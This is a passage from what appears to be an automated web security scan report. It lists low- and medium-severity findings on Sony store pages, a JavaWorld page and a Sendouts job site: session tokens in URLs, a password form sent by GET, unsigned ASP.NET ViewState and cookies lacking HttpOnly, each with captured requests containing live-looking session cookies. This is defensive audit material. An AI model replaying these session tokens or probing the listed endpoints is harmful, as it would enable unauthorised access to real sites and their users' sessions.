Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://www.sony.com/SonySearch/Search?mode=&action=search&pst=xss+playstation&pti=0&psti=0&first=1&sti=0&st=Laptop&ti=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true

Response

HTTP/1.1 200 OK
Cteonnt-Length: 104997
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 104997
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:52 GMT
Connection: close
Cache-Control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<link rel="canonical"
...[SNIP]...
<li class="catItem EPP_SONY_SEL_HIDDEN">
<a class="catItemLink" rel="Store: Right: Business Store" href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1">Business Store</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1" id="smbStoreGlobalFooterLink" rel="" class="directoryListingLink">Business Store</a>
...[SNIP]...

4.2. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 114876
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Tue, 06 Sep 2011 18:50:12 GMT
Content-Length: 114876
Connection: close
Vary: Accept-Encoding
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
<li class="catItem EPP_SONY_SEL_HIDDEN">
<a class="catItemLink" rel="Store: Right: Business Store" href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1">Business Store</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1" id="smbStoreGlobalFooterLink" rel="" class="directoryListingLink">Business Store</a>
...[SNIP]...

4.3. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Cteonnt-Length: 75919
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 75919
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:32 GMT
Connection: close
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclu
...[SNIP]...
<li class="catItem EPP_SONY_SEL_HIDDEN">
<a class="catItemLink" rel="Store: Right: Business Store" href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1">Business Store</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1" id="smbStoreGlobalFooterLink" rel="" class="directoryListingLink">Business Store</a>
...[SNIP]...

4.4. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.javaworld.com
Path:   /javaworld/jw-10-2007/jw-10-acegi2.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:45:52 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67949


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=08b8cb24471b1cc051c579449c9641156b959aaa&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...

5. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.javaworld.com
Path:   /javaworld/jw-10-2007/jw-10-acegi2.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:45:52 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67949


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
<div id="login" name="login" method="post" action="/community/rtn_login08.php">
<form id="form_login">
<fieldset>
...[SNIP]...
<td>
<input name="upass" type="password" id="jq_password" class="inputtext" />
</td>
...[SNIP]...

6. ASP.NET ViewState without MAC enabled  previous  next
There are 3 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


6.1. http://webconnect.sendouts.com/forgot-login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webconnect.sendouts.com
Path:   /forgot-login.aspx

Request

GET /forgot-login.aspx?ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:32:33 GMT
Content-Length: 4005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<HTML>
<HEAD>
       <title>Get My Login Information</title>
       <meta name
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMjA1MjAyMDk2NGRk" />
...[SNIP]...

6.2. http://webconnect.sendouts.com/job-search.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webconnect.sendouts.com
Path:   /job-search.aspx

Request

GET /job-search.aspx?ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:31:40 GMT
Content-Length: 9831


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Search Open
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE2MzA1MDY2NTUPZBYCZg9kFhACBw8QDxYCHgtfIURhdGFCb3VuZGdkEBULFDw8IEFsbCBDYXRlZ29yaWVzID4+EEJ1c2luZXNzIEFuYWx5c3QURGV2ZWxvcGVyL1Byb2dyYW1tZXIHRmluYW5jZR1GaW5hbmNpYWwgU2VydmljZXMgT3BlcmF0aW9ucw9NYXJrZXRpbmcvU2FsZXMTT3BlcmF0aW9uYWwgR2VuZXJhbCRQb3J0Zm9saWlvIE1ndC4gLyBJbnZlc3RtZW50IEFuYWx5c3QRUXVhbGl0eSBBc3N1cmFuY2UQUmVzZWFyY2ggQW5hbHlzdAlUZWNobmljYWwVCwACOTcDMTEyAzEwNwMxMDADMTA5ATQDMTEzAjk5AzExNAMxMDQUKwMLZ2dnZ2dnZ2dnZ2dkZAINDw8WAh4HVmlzaWJsZWhkZAIPDxAPFgIfAWhkZBYAZAIVDxAPFgIfAGdkEBUBA1VTQRUBBzEwMDAwMDAUKwMBZxYBZmQCGQ8QDxYCHwBnZBAVCxo8PCBBbGwgU3RhdGVzIC8gUmVnaW9ucyA+PgpDYWxpZm9ybmlhC0Nvbm5lY3RpY3V0FERpc3RyaWN0IE9mIENvbHVtYmlhB0Zsb3JpZGENTWFzc2FjaHVzZXR0cwpOZXcgSmVyc2V5CE5ldyBZb3JrBE9oaW8MUGVubnN5bHZhbmlhDVdlc3QgVmlyZ2luaWEVCwAHMTAwNTAwMAcxMDEzMDAwBzEwNDIwMDAHMTAxNTAwMAcxMDI2MDAwBzEwMzQwMDAHMTAzNjAwMAcxMDM4MDAwBzEwNDEwMDAHMTAxMDAwMBQrAwtnZ2dnZ2dnZ2dnZxYBZmQCHQ8QZBAVABUAFCsDABYAZAIhDxBkEBUAFQAUKwMAZGQCIw8PZBYCHgdvbkNsaWNrBZcCdmFyIFRoZUZvcm0gPSBkb2N1bWVudC5mb3Jtc1swXTtpZihudWxsIT1UaGVGb3JtKXt2YXIgTWUgPSAoZXZlbnQuc3JjRWxlbWVudCA/IGV2ZW50LnNyY0VsZW1lbnQgOiBldmVudC50YXJnZXQpO01lLmRpc2FibGVkID0gdHJ1ZTt2YXIgZSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2lucHV0Jyk7ZS50eXBlID0gJ2hpZGRlbic7ZS5uYW1lID0gTWUubmFtZTtlLnZhbHVlID0gTWUudmFsdWU7VGhlRm9ybS5hcHBlbmRDaGlsZChlKTtUaGVGb3JtLnN1Ym1pdCgpO31yZXR1cm4gZmFsc2U7ZGQ=" />
...[SNIP]...

6.3. http://webconnect.sendouts.com/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://webconnect.sendouts.com
Path:   /login.aspx

Request

GET /login.aspx?ReturnUrl=%2fcandidate%2fmy-profile.aspx%3fID%3dcfs%26SiteID%3dWebConnect%26Group%3dcfs%26Key%3dCN%26CnId%3d&ID=cfs&SiteID=WebConnect&Group=cfs&Key=CN&CnId= HTTP/1.1
Host: webconnect.sendouts.com
Proxy-Connection: keep-alive
Referer: http://webconnect.sendouts.com/CN_main.aspx?key=cn&id=cfs
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2zmfb345apwujmfqifpo5b55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR ADMa OUR UNRa NOR", policyref="w3c/p3p.xml"
Date: Tue, 06 Sep 2011 20:31:59 GMT
Content-Length: 6707


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LogIn</title
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE0NjI4ODEyODMPZBYCZg9kFgICAQ9kFgICAQ9kFgJmD2QWAmYPZBYCZg9kFgICAQ9kFgQCCQ8PZBYCHgdvbkNsaWNrBZcCdmFyIFRoZUZvcm0gPSBkb2N1bWVudC5mb3Jtc1swXTtpZihudWxsIT1UaGVGb3JtKXt2YXIgTWUgPSAoZXZlbnQuc3JjRWxlbWVudCA/IGV2ZW50LnNyY0VsZW1lbnQgOiBldmVudC50YXJnZXQpO01lLmRpc2FibGVkID0gdHJ1ZTt2YXIgZSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2lucHV0Jyk7ZS50eXBlID0gJ2hpZGRlbic7ZS5uYW1lID0gTWUubmFtZTtlLnZhbHVlID0gTWUudmFsdWU7VGhlRm9ybS5hcHBlbmRDaGlsZChlKTtUaGVGb3JtLnN1Ym1pdCgpO31yZXR1cm4gZmFsc2U7ZAILDw8WAh4LTmF2aWdhdGVVcmwFQWZvcmdvdC1sb2dpbi5hc3B4P0lEPWNmcyZTaXRlSUQ9V2ViQ29ubmVjdCZHcm91cD1jZnMmS2V5PUNOJkNuSWQ9FgYeC29ubW91c2VvdmVyBTJzdGF0dXM9J0ZvcmdldCB1c2VybmFtZSBvciBwYXNzd29yZCc7IHJldHVybiB0cnVlOx4Kb25tb3VzZW91dAUKc3RhdHVzPScnOx4Hb25jbGljawUKc3RhdHVzPScnO2Rk" />
...[SNIP]...

7. Cookie without HttpOnly flag set  previous  next
There are 16 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



7.1. http://www.kb.sony.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kb.sony.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":3.5,"c":"http://esupport.sony.com/US/perl/select-system.pl","pv":3,"lc":{"d0":{"v":3,"s":true}},"f":1315353199262,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; Path=/
Location: http://esupport.sony.com
Content-Type: text/html
Content-Length: 0
Date: Tue, 06 Sep 2011 18:55:20 GMT


7.2. http://www.kb.sony.com/selfservice/closeviewdocument.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kb.sony.com
Path:   /selfservice/closeviewdocument.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /selfservice/closeviewdocument.do?externalId=BNP1USESpdf HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
